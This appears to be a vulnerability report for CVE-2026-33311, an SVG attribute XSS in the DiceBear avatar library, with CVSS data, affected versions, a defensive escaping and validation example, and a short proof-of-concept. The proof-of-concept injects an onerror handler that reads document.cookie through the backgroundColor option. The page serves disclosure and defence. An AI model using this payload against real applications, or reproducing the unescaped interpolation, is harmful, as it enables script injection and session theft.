Security Vulnerability Report
CVE-2026-33311 CVSS 4.7 MEDIUM

Published: 2026-03-24 14:16:30
Last Modified: 2026-03-24 19:19:31

Description

DiceBear is an avatar library for designers and developers. Starting in version 5.0.0 and prior to versions 5.4.4, 6.1.4, 7.1.4, 8.0.3, and 9.4.1, SVG attribute values derived from user-supplied options (`backgroundColor`, `fontFamily`, `textColor`) were not XML-escaped before interpolation into SVG output. This could allow Cross-Site Scripting (XSS) when applications pass untrusted input to `createAvatar()` and serve the resulting SVG inline or with `Content-Type: image/svg+xml`. Starting in versions 5.4.4, 6.1.4, 7.1.4, 8.0.3, and 9.4.1, all affected SVG attribute values are properly escaped using XML entity encoding. Users should upgrade to the listed patched versions. Some mitigating factors limit vulnerability. Applications that validate input against the library's JSON Schema before passing it to `createAvatar()` are not affected. The DiceBear CLI validates input via AJV and was not vulnerable. Exploitation requires that an application passes untrusted, unvalidated external input directly as option values.
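As an added example (not DiceBear's own code), the two defences the description refers to, XML-entity escaping of attribute values and allow-list validation of option values, together with a review check that shows why an unescaped value is an attribute breakout; the SVG template, function names and the six-hex-digit colour rule are assumptions.

```javascript
// Added example, not DiceBear's code: the two defences the advisory names,
// XML-entity escaping of attribute values and allow-list validation of options.
// Function names, the SVG template and the hex-colour rule are assumptions.

const XML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&apos;' };

// Escape the five characters that are significant inside an XML attribute value.
function escapeXmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => XML_ENTITIES[ch]);
}

// Allow-list check standing in for the JSON Schema validation the advisory mentions
// (assumed format: six hex digits, no '#').
function isHexColor(value) {
  return /^[0-9a-fA-F]{6}$/.test(String(value));
}

// Vulnerable pattern: the option value is interpolated into the markup as-is.
function renderUnsafe(backgroundColor) {
  return `<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" fill="${backgroundColor}"/></svg>`;
}

// Hardened pattern: same template, value escaped before interpolation.
function renderSafe(backgroundColor) {
  return `<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" fill="${escapeXmlAttr(backgroundColor)}"/></svg>`;
}

// Review check: list the attribute names on the <rect>. A value that escapes its
// quotes shows up here as attributes the template never declared.
function attributeNames(svg) {
  const rect = svg.match(/<rect\b([^>]*)\/>/)[1];
  return [...rect.matchAll(/\s([a-zA-Z:-]+)="/g)].map((m) => m[1]);
}

// Constructed sample: closes the fill attribute and appends a harmless extra one.
const INJECTED = 'red" data-injected="1';

console.log(attributeNames(renderUnsafe(INJECTED))); // width, height, fill, data-injected
console.log(attributeNames(renderSafe(INJECTED)));   // width, height, fill
console.log(isHexColor('b6e3f4'), isHexColor(INJECTED)); // true false
```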

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting")

Configurations (Affected Products)

cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*  5.0.0 <= version < 5.4.4  VULNERABLE
cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*  6.0.0 <= version < 6.1.4  VULNERABLE
cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*  7.0.0 <= version < 7.1.4  VULNERABLE
cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*  8.0.0 <= version < 8.0.3  VULNERABLE
cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*  9.0.0 <= version < 9.4.1  VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// PoC Concept for CVE-2026-33311
// Target: DiceBear < 5.4.4, 6.1.4, etc.
// Description: Injecting malicious JS via backgroundColor attribute
const { createAvatar } = require('@dicebear/core');
const { avataaars } = require('@dicebear/collection');

// Malicious payload containing XSS payload
// The closing quote (") closes the SVG attribute, and onerror injects the script
const payload = 'red" onerror="alert(document.cookie)';

try {
  const avatar = createAvatar(avataaars, {
    backgroundColor: payload // Untrusted user input used directly
  });
  const svg = avatar.toString();
  console.log(svg);
  // The output SVG will look like:
  // <svg ...> <path fill="red" onerror="alert(document.cookie)" ... /> </svg>
  // When served with Content-Type: image/svg+xml, the alert executes.
} catch (e) {
  console.error(e);
}
```

References

https://github.com/dicebear/dicebear/security/advisories/GHSA-mr9r-mww3-v6gv (Vendor Advisory)